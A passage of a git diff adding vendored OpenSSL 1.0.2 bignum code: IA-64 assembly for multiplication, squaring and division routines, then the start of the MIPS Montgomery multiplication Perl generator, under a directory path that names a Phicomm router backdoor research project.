+	cmp.ltu		p6,p0=r25,r24
+	add		r26=r26,r25		};;
+{ .mfb;		getf.sig	r17=f102	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,r25
+	add		r27=r27,r26		};;
+{ .mfb;	nop.m	0x0				}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r27,r26
+	add		r28=r28,r27		};;
+{ .mii;		getf.sig	r18=f93
+		add		r17=r17,r16
+		mov		carry3=0	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r28,r27
+	add		r29=r29,r28		};;
+{ .mii;		getf.sig	r19=f84
+		cmp.ltu		p7,p0=r17,r16	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r29,r28
+	add		r30=r30,r29		};;
+{ .mii;		getf.sig	r20=f75
+		add		r18=r18,r17	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r30,r29
+	add		r31=r31,r30		};;
+{ .mfb;		getf.sig	r21=f66		}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r18,r17
+		add		r19=r19,r18	}
+{ .mfb;	nop.m	0x0				}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r31,r30
+	add		r31=r31,carry2		};;
+{ .mfb;		getf.sig	r22=f57		}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r19,r18
+		add		r20=r20,r19	}
+{ .mfb;	nop.m	0x0				}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r31,carry2	};;
+{ .mfb;		getf.sig	r23=f48		}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r20,r19
+		add		r21=r21,r20	}
+{ .mii;
+(p6)	add		carry1=1,carry1		}
+{ .mfb;	st8		[r33]=r31,16		};;
+
+{ .mfb;	getf.sig	r24=f112		}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r21,r20
+		add		r22=r22,r21	};;
+{ .mfb;	getf.sig	r25=f103		}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r22,r21
+		add		r23=r23,r22	};;
+{ .mfb;	getf.sig	r26=f94			}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r23,r22
+		add		r23=r23,carry1	};;
+{ .mfb;	getf.sig	r27=f85			}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p8=r23,carry1};;
+{ .mii;	getf.sig	r28=f76
+	add		r25=r25,r24
+	mov		carry1=0		}
+{ .mii;		st8		[r32]=r23,16
+	(p7)	add		carry2=1,carry3
+	(p8)	add		carry2=0,carry3	};;
+
+{ .mfb;	nop.m	0x0				}
+{ .mii;	getf.sig	r29=f67
+	cmp.ltu		p6,p0=r25,r24
+	add		r26=r26,r25		};;
+{ .mfb;	getf.sig	r30=f58			}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,r25
+	add		r27=r27,r26		};;
+{ .mfb;		getf.sig	r16=f113	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r27,r26
+	add		r28=r28,r27		};;
+{ .mfb;		getf.sig	r17=f104	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r28,r27
+	add		r29=r29,r28		};;
+{ .mfb;		getf.sig	r18=f95		}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r29,r28
+	add		r30=r30,r29		};;
+{ .mii;		getf.sig	r19=f86
+		add		r17=r17,r16
+		mov		carry3=0	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r30,r29
+	add		r30=r30,carry2		};;
+{ .mii;		getf.sig	r20=f77
+		cmp.ltu		p7,p0=r17,r16
+		add		r18=r18,r17	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r30,carry2	};;
+{ .mfb;		getf.sig	r21=f68		}
+{ .mii;	st8		[r33]=r30,16
+(p6)	add		carry1=1,carry1		};;
+
+{ .mfb;	getf.sig	r24=f114		}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r18,r17
+		add		r19=r19,r18	};;
+{ .mfb;	getf.sig	r25=f105		}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r19,r18
+		add		r20=r20,r19	};;
+{ .mfb;	getf.sig	r26=f96			}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r20,r19
+		add		r21=r21,r20	};;
+{ .mfb;	getf.sig	r27=f87			}
+{ .mii;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p0=r21,r20
+		add		r21=r21,carry1	};;
+{ .mib;	getf.sig	r28=f78			
+	add		r25=r25,r24		}
+{ .mib;	(p7)	add		carry3=1,carry3
+		cmp.ltu		p7,p8=r21,carry1};;
+{ .mii;		st8		[r32]=r21,16
+	(p7)	add		carry2=1,carry3
+	(p8)	add		carry2=0,carry3	}
+
+{ .mii;	mov		carry1=0
+	cmp.ltu		p6,p0=r25,r24
+	add		r26=r26,r25		};;
+{ .mfb;		getf.sig	r16=f115	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,r25
+	add		r27=r27,r26		};;
+{ .mfb;		getf.sig	r17=f106	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r27,r26
+	add		r28=r28,r27		};;
+{ .mfb;		getf.sig	r18=f97		}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r28,r27
+	add		r28=r28,carry2		};;
+{ .mib;		getf.sig	r19=f88
+		add		r17=r17,r16	}
+{ .mib;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r28,carry2	};;
+{ .mii;	st8		[r33]=r28,16
+(p6)	add		carry1=1,carry1		}
+
+{ .mii;		mov		carry2=0
+		cmp.ltu		p7,p0=r17,r16
+		add		r18=r18,r17	};;
+{ .mfb;	getf.sig	r24=f116		}
+{ .mii;	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r18,r17
+		add		r19=r19,r18	};;
+{ .mfb;	getf.sig	r25=f107		}
+{ .mii;	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r19,r18
+		add		r19=r19,carry1	};;
+{ .mfb;	getf.sig	r26=f98			}
+{ .mii;	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r19,carry1};;
+{ .mii;		st8		[r32]=r19,16
+	(p7)	add		carry2=1,carry2	}
+
+{ .mfb;	add		r25=r25,r24		};;
+
+{ .mfb;		getf.sig	r16=f117	}
+{ .mii;	mov		carry1=0
+	cmp.ltu		p6,p0=r25,r24
+	add		r26=r26,r25		};;
+{ .mfb;		getf.sig	r17=f108	}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,r25
+	add		r26=r26,carry2		};;
+{ .mfb;	nop.m	0x0				}
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,carry2	};;
+{ .mii;	st8		[r33]=r26,16
+(p6)	add		carry1=1,carry1		}
+
+{ .mfb;		add		r17=r17,r16	};;
+{ .mfb;	getf.sig	r24=f118		}
+{ .mii;		mov		carry2=0
+		cmp.ltu		p7,p0=r17,r16
+		add		r17=r17,carry1	};;
+{ .mii;	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r17,carry1};;
+{ .mii;		st8		[r32]=r17
+	(p7)	add		carry2=1,carry2	};;
+{ .mfb;	add		r24=r24,carry2		};;
+{ .mib;	st8		[r33]=r24		}
+
+{ .mib;	rum		1<<5		// clear um.mfh
+	br.ret.sptk.many	b0	};;
+.endp	bn_mul_comba8#
+#undef	carry3
+#undef	carry2
+#undef	carry1
+#endif
+
+#if 1
+// It's possible to make it faster (see comment to bn_sqr_comba8), but
+// I reckon it doesn't worth the effort. Basically because the routine
+// (actually both of them) practically never called... So I just play
+// same trick as with bn_sqr_comba8.
+//
+// void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
+//
+.global	bn_sqr_comba4#
+.proc	bn_sqr_comba4#
+.align	64
+bn_sqr_comba4:
+	.prologue
+	.save	ar.pfs,r2
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+{ .mii;	alloc   r2=ar.pfs,2,1,0,0
+	addp4	r32=0,r32
+	addp4	r33=0,r33		};;
+{ .mii;
+#else
+{ .mii;	alloc	r2=ar.pfs,2,1,0,0
+#endif
+	mov	r34=r33
+	add	r14=8,r33		};;
+	.body
+{ .mii;	add	r17=8,r34
+	add	r15=16,r33
+	add	r18=16,r34		}
+{ .mfb;	add	r16=24,r33
+	br	.L_cheat_entry_point4	};;
+.endp	bn_sqr_comba4#
+#endif
+
+#if 1
+// Runs in ~115 cycles and ~4.5 times faster than C. Well, whatever...
+//
+// void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+//
+#define	carry1	r14
+#define	carry2	r15
+.global	bn_mul_comba4#
+.proc	bn_mul_comba4#
+.align	64
+bn_mul_comba4:
+	.prologue
+	.save	ar.pfs,r2
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+{ .mii;	alloc   r2=ar.pfs,3,0,0,0
+	addp4	r33=0,r33
+	addp4	r34=0,r34		};;
+{ .mii;	addp4	r32=0,r32
+#else
+{ .mii;	alloc	r2=ar.pfs,3,0,0,0
+#endif
+	add	r14=8,r33
+	add	r17=8,r34		}
+	.body
+{ .mii;	add	r15=16,r33
+	add	r18=16,r34
+	add	r16=24,r33		};;
+.L_cheat_entry_point4:
+{ .mmi;	add	r19=24,r34
+
+	ldf8	f32=[r33]		}
+
+{ .mmi;	ldf8	f120=[r34]
+	ldf8	f121=[r17]		};;
+{ .mmi;	ldf8	f122=[r18]
+	ldf8	f123=[r19]		}
+
+{ .mmi;	ldf8	f33=[r14]
+	ldf8	f34=[r15]		}
+{ .mfi;	ldf8	f35=[r16]
+
+		xma.hu	f41=f32,f120,f0		}
+{ .mfi;		xma.lu	f40=f32,f120,f0		};;
+{ .mfi;		xma.hu	f51=f32,f121,f0		}
+{ .mfi;		xma.lu	f50=f32,f121,f0		};;
+{ .mfi;		xma.hu	f61=f32,f122,f0		}
+{ .mfi;		xma.lu	f60=f32,f122,f0		};;
+{ .mfi;		xma.hu	f71=f32,f123,f0		}
+{ .mfi;		xma.lu	f70=f32,f123,f0		};;//
+// Major stall takes place here, and 3 more places below. Result from
+// first xma is not available for another 3 ticks.
+{ .mfi;	getf.sig	r16=f40
+		xma.hu	f42=f33,f120,f41
+	add		r33=8,r32		}
+{ .mfi;		xma.lu	f41=f33,f120,f41	};;
+{ .mfi;	getf.sig	r24=f50
+		xma.hu	f52=f33,f121,f51	}
+{ .mfi;		xma.lu	f51=f33,f121,f51	};;
+{ .mfi;	st8		[r32]=r16,16
+		xma.hu	f62=f33,f122,f61	}
+{ .mfi;		xma.lu	f61=f33,f122,f61	};;
+{ .mfi;		xma.hu	f72=f33,f123,f71	}
+{ .mfi;		xma.lu	f71=f33,f123,f71	};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r25=f41
+		xma.hu	f43=f34,f120,f42	}
+{ .mfi;		xma.lu	f42=f34,f120,f42	};;
+{ .mfi;	getf.sig	r16=f60
+		xma.hu	f53=f34,f121,f52	}
+{ .mfi;		xma.lu	f52=f34,f121,f52	};;
+{ .mfi;	getf.sig	r17=f51
+		xma.hu	f63=f34,f122,f62
+	add		r25=r25,r24		}
+{ .mfi;	mov		carry1=0
+		xma.lu	f62=f34,f122,f62	};;
+{ .mfi;	st8		[r33]=r25,16
+		xma.hu	f73=f34,f123,f72
+	cmp.ltu		p6,p0=r25,r24		}
+{ .mfi;		xma.lu	f72=f34,f123,f72	};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r18=f42
+		xma.hu	f44=f35,f120,f43
+(p6)	add		carry1=1,carry1		}
+{ .mfi;	add		r17=r17,r16
+		xma.lu	f43=f35,f120,f43
+	mov		carry2=0		};;
+{ .mfi;	getf.sig	r24=f70
+		xma.hu	f54=f35,f121,f53
+	cmp.ltu		p7,p0=r17,r16		}
+{ .mfi;		xma.lu	f53=f35,f121,f53	};;
+{ .mfi;	getf.sig	r25=f61
+		xma.hu	f64=f35,f122,f63
+	add		r18=r18,r17		}
+{ .mfi;		xma.lu	f63=f35,f122,f63
+(p7)	add		carry2=1,carry2		};;
+{ .mfi;	getf.sig	r26=f52
+		xma.hu	f74=f35,f123,f73
+	cmp.ltu		p7,p0=r18,r17		}
+{ .mfi;		xma.lu	f73=f35,f123,f73
+	add		r18=r18,carry1		};;
+//-------------------------------------------------//
+{ .mii;	st8		[r32]=r18,16
+(p7)	add		carry2=1,carry2
+	cmp.ltu		p7,p0=r18,carry1	};;
+
+{ .mfi;	getf.sig	r27=f43	// last major stall
+(p7)	add		carry2=1,carry2		};;
+{ .mii;		getf.sig	r16=f71
+	add		r25=r25,r24
+	mov		carry1=0		};;
+{ .mii;		getf.sig	r17=f62	
+	cmp.ltu		p6,p0=r25,r24
+	add		r26=r26,r25		};;
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,r25
+	add		r27=r27,r26		};;
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r27,r26
+	add		r27=r27,carry2		};;
+{ .mii;		getf.sig	r18=f53
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r27,carry2	};;
+{ .mfi;	st8		[r33]=r27,16
+(p6)	add		carry1=1,carry1		}
+
+{ .mii;		getf.sig	r19=f44
+		add		r17=r17,r16
+		mov		carry2=0	};;
+{ .mii;	getf.sig	r24=f72
+		cmp.ltu		p7,p0=r17,r16
+		add		r18=r18,r17	};;
+{ .mii;	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r18,r17
+		add		r19=r19,r18	};;
+{ .mii;	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r19,r18
+		add		r19=r19,carry1	};;
+{ .mii;	getf.sig	r25=f63
+	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r19,carry1};;
+{ .mii;		st8		[r32]=r19,16
+	(p7)	add		carry2=1,carry2	}
+
+{ .mii;	getf.sig	r26=f54
+	add		r25=r25,r24
+	mov		carry1=0		};;
+{ .mii;		getf.sig	r16=f73
+	cmp.ltu		p6,p0=r25,r24
+	add		r26=r26,r25		};;
+{ .mii;
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,r25
+	add		r26=r26,carry2		};;
+{ .mii;		getf.sig	r17=f64
+(p6)	add		carry1=1,carry1
+	cmp.ltu		p6,p0=r26,carry2	};;
+{ .mii;	st8		[r33]=r26,16
+(p6)	add		carry1=1,carry1		}
+
+{ .mii;	getf.sig	r24=f74
+		add		r17=r17,r16	
+		mov		carry2=0	};;
+{ .mii;		cmp.ltu		p7,p0=r17,r16
+		add		r17=r17,carry1	};;
+
+{ .mii;	(p7)	add		carry2=1,carry2
+		cmp.ltu		p7,p0=r17,carry1};;
+{ .mii;		st8		[r32]=r17,16
+	(p7)	add		carry2=1,carry2	};;
+
+{ .mii;	add		r24=r24,carry2		};;
+{ .mii;	st8		[r33]=r24		}
+
+{ .mib;	rum		1<<5		// clear um.mfh
+	br.ret.sptk.many	b0	};;
+.endp	bn_mul_comba4#
+#undef	carry2
+#undef	carry1
+#endif
+
+#if 1
+//
+// BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d)
+//
+// In the nutshell it's a port of my MIPS III/IV implementation.
+//
+#define	AT	r14
+#define	H	r16
+#define	HH	r20
+#define	L	r17
+#define	D	r18
+#define	DH	r22
+#define	I	r21
+
+#if 0
+// Some preprocessors (most notably HP-UX) appear to be allergic to
+// macros enclosed to parenthesis [as these three were].
+#define	cont	p16
+#define	break	p0	// p20
+#define	equ	p24
+#else
+cont=p16
+break=p0
+equ=p24
+#endif
+
+.global	abort#
+.global	bn_div_words#
+.proc	bn_div_words#
+.align	64
+bn_div_words:
+	.prologue
+	.save	ar.pfs,r2
+{ .mii;	alloc		r2=ar.pfs,3,5,0,8
+	.save	b0,r3
+	mov		r3=b0
+	.save	pr,r10
+	mov		r10=pr		};;
+{ .mmb;	cmp.eq		p6,p0=r34,r0
+	mov		r8=-1
+(p6)	br.ret.spnt.many	b0	};;
+
+	.body
+{ .mii;	mov		H=r32		// save h
+	mov		ar.ec=0		// don't rotate at exit
+	mov		pr.rot=0	}
+{ .mii;	mov		L=r33		// save l
+	mov		r36=r0		};;
+
+.L_divw_shift:	// -vv- note signed comparison
+{ .mfi;	(p0)	cmp.lt		p16,p0=r0,r34	// d
+	(p0)	shladd		r33=r34,1,r0	}
+{ .mfb;	(p0)	add		r35=1,r36
+	(p0)	nop.f		0x0
+(p16)	br.wtop.dpnt		.L_divw_shift	};;
+
+{ .mii;	mov		D=r34
+	shr.u		DH=r34,32
+	sub		r35=64,r36		};;
+{ .mii;	setf.sig	f7=DH
+	shr.u		AT=H,r35
+	mov		I=r36			};;
+{ .mib;	cmp.ne		p6,p0=r0,AT
+	shl		H=H,r36
+(p6)	br.call.spnt.clr	b0=abort	};;	// overflow, die...
+
+{ .mfi;	fcvt.xuf.s1	f7=f7
+	shr.u		AT=L,r35		};;
+{ .mii;	shl		L=L,r36
+	or		H=H,AT			};;
+
+{ .mii;	nop.m		0x0
+	cmp.leu		p6,p0=D,H;;
+(p6)	sub		H=H,D			}
+
+{ .mlx;	setf.sig	f14=D
+	movl		AT=0xffffffff		};;
+///////////////////////////////////////////////////////////
+{ .mii;	setf.sig	f6=H
+	shr.u		HH=H,32;;
+	cmp.eq		p6,p7=HH,DH		};;
+{ .mfb;
+(p6)	setf.sig	f8=AT
+(p7)	fcvt.xuf.s1	f6=f6
+(p7)	br.call.sptk	b6=.L_udiv64_32_b6	};;
+
+{ .mfi;	getf.sig	r33=f8				// q
+	xmpy.lu		f9=f8,f14		}
+{ .mfi;	xmpy.hu		f10=f8,f14
+	shrp		H=H,L,32		};;
+
+{ .mmi;	getf.sig	r35=f9				// tl
+	getf.sig	r31=f10			};;	// th
+
+.L_divw_1st_iter:
+{ .mii;	(p0)	add		r32=-1,r33
+	(p0)	cmp.eq		equ,cont=HH,r31		};;
+{ .mii;	(p0)	cmp.ltu		p8,p0=r35,D
+	(p0)	sub		r34=r35,D
+	(equ)	cmp.leu		break,cont=r35,H	};;
+{ .mib;	(cont)	cmp.leu		cont,break=HH,r31
+	(p8)	add		r31=-1,r31
+(cont)	br.wtop.spnt		.L_divw_1st_iter	};;
+///////////////////////////////////////////////////////////
+{ .mii;	sub		H=H,r35
+	shl		r8=r33,32
+	shl		L=L,32			};;
+///////////////////////////////////////////////////////////
+{ .mii;	setf.sig	f6=H
+	shr.u		HH=H,32;;
+	cmp.eq		p6,p7=HH,DH		};;
+{ .mfb;
+(p6)	setf.sig	f8=AT
+(p7)	fcvt.xuf.s1	f6=f6
+(p7)	br.call.sptk	b6=.L_udiv64_32_b6	};;
+
+{ .mfi;	getf.sig	r33=f8				// q
+	xmpy.lu		f9=f8,f14		}
+{ .mfi;	xmpy.hu		f10=f8,f14
+	shrp		H=H,L,32		};;
+
+{ .mmi;	getf.sig	r35=f9				// tl
+	getf.sig	r31=f10			};;	// th
+
+.L_divw_2nd_iter:
+{ .mii;	(p0)	add		r32=-1,r33
+	(p0)	cmp.eq		equ,cont=HH,r31		};;
+{ .mii;	(p0)	cmp.ltu		p8,p0=r35,D
+	(p0)	sub		r34=r35,D
+	(equ)	cmp.leu		break,cont=r35,H	};;
+{ .mib;	(cont)	cmp.leu		cont,break=HH,r31
+	(p8)	add		r31=-1,r31
+(cont)	br.wtop.spnt		.L_divw_2nd_iter	};;
+///////////////////////////////////////////////////////////
+{ .mii;	sub	H=H,r35
+	or	r8=r8,r33
+	mov	ar.pfs=r2		};;
+{ .mii;	shr.u	r9=H,I			// remainder if anybody wants it
+	mov	pr=r10,0x1ffff		}
+{ .mfb;	br.ret.sptk.many	b0	};;
+
+// Unsigned 64 by 32 (well, by 64 for the moment) bit integer division
+// procedure.
+//
+// inputs:	f6 = (double)a, f7 = (double)b
+// output:	f8 = (int)(a/b)
+// clobbered:	f8,f9,f10,f11,pred
+pred=p15
+// One can argue that this snippet is copyrighted to Intel
+// Corporation, as it's essentially identical to one of those
+// found in "Divide, Square Root and Remainder" section at
+// http://www.intel.com/software/products/opensource/libraries/num.htm.
+// Yes, I admit that the referred code was used as template,
+// but after I realized that there hardly is any other instruction
+// sequence which would perform this operation. I mean I figure that
+// any independent attempt to implement high-performance division
+// will result in code virtually identical to the Intel code. It
+// should be noted though that below division kernel is 1 cycle
+// faster than Intel one (note commented splits:-), not to mention
+// original prologue (rather lack of one) and epilogue.
+.align	32
+.skip	16
+.L_udiv64_32_b6:
+	frcpa.s1	f8,pred=f6,f7;;		// [0]  y0 = 1 / b
+
+(pred)	fnma.s1		f9=f7,f8,f1		// [5]  e0 = 1 - b * y0
+(pred)	fmpy.s1		f10=f6,f8;;		// [5]  q0 = a * y0
+(pred)	fmpy.s1		f11=f9,f9		// [10] e1 = e0 * e0
+(pred)	fma.s1		f10=f9,f10,f10;;	// [10] q1 = q0 + e0 * q0
+(pred)	fma.s1		f8=f9,f8,f8	//;;	// [15] y1 = y0 + e0 * y0
+(pred)	fma.s1		f9=f11,f10,f10;;	// [15] q2 = q1 + e1 * q1
+(pred)	fma.s1		f8=f11,f8,f8	//;;	// [20] y2 = y1 + e1 * y1
+(pred)	fnma.s1		f10=f7,f9,f6;;		// [20] r2 = a - b * q2
+(pred)	fma.s1		f8=f10,f8,f9;;		// [25] q3 = q2 + r2 * y2
+
+	fcvt.fxu.trunc.s1	f8=f8		// [30] q = trunc(q3)
+	br.ret.sptk.many	b6;;
+.endp	bn_div_words#
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips-mont.pl
new file mode 100644
index 0000000..a33cdf4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips-mont.pl
@@ -0,0 +1,426 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# This module doesn't present direct interest for OpenSSL, because it
+# doesn't provide better performance for longer keys, at least not on
+# in-order-execution cores. While 512-bit RSA sign operations can be
+# 65% faster in 64-bit mode, 1024-bit ones are only 15% faster, and
+# 4096-bit ones are up to 15% slower. In 32-bit mode it varies from
+# 16% improvement for 512-bit RSA sign to -33% for 4096-bit RSA
+# verify:-( All comparisons are against bn_mul_mont-free assembler.
+# The module might be of interest to embedded system developers, as
+# the code is smaller than 1KB, yet offers >3x improvement on MIPS64
+# and 75-30% [less for longer keys] on MIPS32 over compiler-generated
+# code.
+
+######################################################################
+# There is a number of MIPS ABI in use, O32 and N32/64 are most
+# widely used. Then there is a new contender: NUBI. It appears that if
+# one picks the latter, it's possible to arrange code in ABI neutral
+# manner. Therefore let's stick to NUBI register layout:
+#
+($zero,$at,$t0,$t1,$t2)=map("\$$_",(0..2,24,25));
+($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7,$s8,$s9,$s10,$s11)=map("\$$_",(12..23));
+($gp,$tp,$sp,$fp,$ra)=map("\$$_",(3,28..31));
+#
+# The return value is placed in $a0. Following coding rules facilitate
+# interoperability:
+#
+# - never ever touch $tp, "thread pointer", former $gp;
+# - copy return value to $t0, former $v0 [or to $a0 if you're adapting
+#   old code];
+# - on O32 populate $a4-$a7 with 'lw $aN,4*N($sp)' if necessary;
+#
+# For reference here is register layout for N32/64 MIPS ABIs:
+#
+# ($zero,$at,$v0,$v1)=map("\$$_",(0..3));
+# ($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+# ($t0,$t1,$t2,$t3,$t8,$t9)=map("\$$_",(12..15,24,25));
+# ($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7)=map("\$$_",(16..23));
+# ($gp,$sp,$fp,$ra)=map("\$$_",(28..31));
+#
+$flavour = shift || "o32"; # supported flavours are o32,n32,64,nubi32,nubi64
+
+if ($flavour =~ /64|n32/i) {
+	$PTR_ADD="dadd";	# incidentally works even on n32
+	$PTR_SUB="dsub";	# incidentally works even on n32
+	$REG_S="sd";
+	$REG_L="ld";
+	$SZREG=8;
+} else {
+	$PTR_ADD="add";
+	$PTR_SUB="sub";
+	$REG_S="sw";
+	$REG_L="lw";
+	$SZREG=4;
+}
+$SAVED_REGS_MASK = ($flavour =~ /nubi/i) ? 0x00fff000 : 0x00ff0000;
+#
+# <appro@openssl.org>
+#
+######################################################################
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+if ($flavour =~ /64|n32/i) {
+	$LD="ld";
+	$ST="sd";
+	$MULTU="dmultu";
+	$ADDU="daddu";
+	$SUBU="dsubu";
+	$BNSZ=8;
+} else {
+	$LD="lw";
+	$ST="sw";
+	$MULTU="multu";
+	$ADDU="addu";
+	$SUBU="subu";
+	$BNSZ=4;
+}
+
+# int bn_mul_mont(
+$rp=$a0;	# BN_ULONG *rp,
+$ap=$a1;	# const BN_ULONG *ap,
+$bp=$a2;	# const BN_ULONG *bp,
+$np=$a3;	# const BN_ULONG *np,
+$n0=$a4;	# const BN_ULONG *n0,
+$num=$a5;	# int num);
+
+$lo0=$a6;
+$hi0=$a7;
+$lo1=$t1;
+$hi1=$t2;
+$aj=$s0;
+$bi=$s1;
+$nj=$s2;
+$tp=$s3;
+$alo=$s4;
+$ahi=$s5;
+$nlo=$s6;
+$nhi=$s7;
+$tj=$s8;
+$i=$s9;
+$j=$s10;
+$m1=$s11;
+
+$FRAMESIZE=14;
+
+$code=<<___;
+.text
+
+.set	noat
+.set	noreorder
+
+.align	5
+.globl	bn_mul_mont
+.ent	bn_mul_mont
+bn_mul_mont:
+___
+$code.=<<___ if ($flavour =~ /o32/i);
+	lw	$n0,16($sp)
+	lw	$num,20($sp)
+___
+$code.=<<___;
+	slt	$at,$num,4
+	bnez	$at,1f
+	li	$t0,0
+	slt	$at,$num,17	# on in-order CPU
+	bnez	$at,bn_mul_mont_internal
+	nop
+1:	jr	$ra
+	li	$a0,0
+.end	bn_mul_mont
+
+.align	5
+.ent	bn_mul_mont_internal
+bn_mul_mont_internal:
+	.frame	$fp,$FRAMESIZE*$SZREG,$ra
+	.mask	0x40000000|$SAVED_REGS_MASK,-$SZREG
+	$PTR_SUB $sp,$FRAMESIZE*$SZREG
+	$REG_S	$fp,($FRAMESIZE-1)*$SZREG($sp)
+	$REG_S	$s11,($FRAMESIZE-2)*$SZREG($sp)
+	$REG_S	$s10,($FRAMESIZE-3)*$SZREG($sp)
+	$REG_S	$s9,($FRAMESIZE-4)*$SZREG($sp)
+	$REG_S	$s8,($FRAMESIZE-5)*$SZREG($sp)
+	$REG_S	$s7,($FRAMESIZE-6)*$SZREG($sp)
+	$REG_S	$s6,($FRAMESIZE-7)*$SZREG($sp)
+	$REG_S	$s5,($FRAMESIZE-8)*$SZREG($sp)
+	$REG_S	$s4,($FRAMESIZE-9)*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_S	$s3,($FRAMESIZE-10)*$SZREG($sp)
+	$REG_S	$s2,($FRAMESIZE-11)*$SZREG($sp)
+	$REG_S	$s1,($FRAMESIZE-12)*$SZREG($sp)
+	$REG_S	$s0,($FRAMESIZE-13)*$SZREG($sp)
+___
+$code.=<<___;
+	move	$fp,$sp
+
+	.set	reorder
+	$LD	$n0,0($n0)
+	$LD	$bi,0($bp)	# bp[0]
+	$LD	$aj,0($ap)	# ap[0]
+	$LD	$nj,0($np)	# np[0]
+
+	$PTR_SUB $sp,2*$BNSZ	# place for two extra words
+	sll	$num,`log($BNSZ)/log(2)`
+	li	$at,-4096
+	$PTR_SUB $sp,$num
+	and	$sp,$at
+
+	$MULTU	$aj,$bi
+	$LD	$alo,$BNSZ($ap)
+	$LD	$nlo,$BNSZ($np)
+	mflo	$lo0
+	mfhi	$hi0
+	$MULTU	$lo0,$n0
+	mflo	$m1
+
+	$MULTU	$alo,$bi
+	mflo	$alo
+	mfhi	$ahi
+
+	$MULTU	$nj,$m1
+	mflo	$lo1
+	mfhi	$hi1
+	$MULTU	$nlo,$m1
+	$ADDU	$lo1,$lo0
+	sltu	$at,$lo1,$lo0
+	$ADDU	$hi1,$at
+	mflo	$nlo
+	mfhi	$nhi
+
+	move	$tp,$sp
+	li	$j,2*$BNSZ
+.align	4
+.L1st:
+	.set	noreorder
+	$PTR_ADD $aj,$ap,$j
+	$PTR_ADD $nj,$np,$j
+	$LD	$aj,($aj)
+	$LD	$nj,($nj)
+
+	$MULTU	$aj,$bi
+	$ADDU	$lo0,$alo,$hi0
+	$ADDU	$lo1,$nlo,$hi1
+	sltu	$at,$lo0,$hi0
+	sltu	$t0,$lo1,$hi1
+	$ADDU	$hi0,$ahi,$at
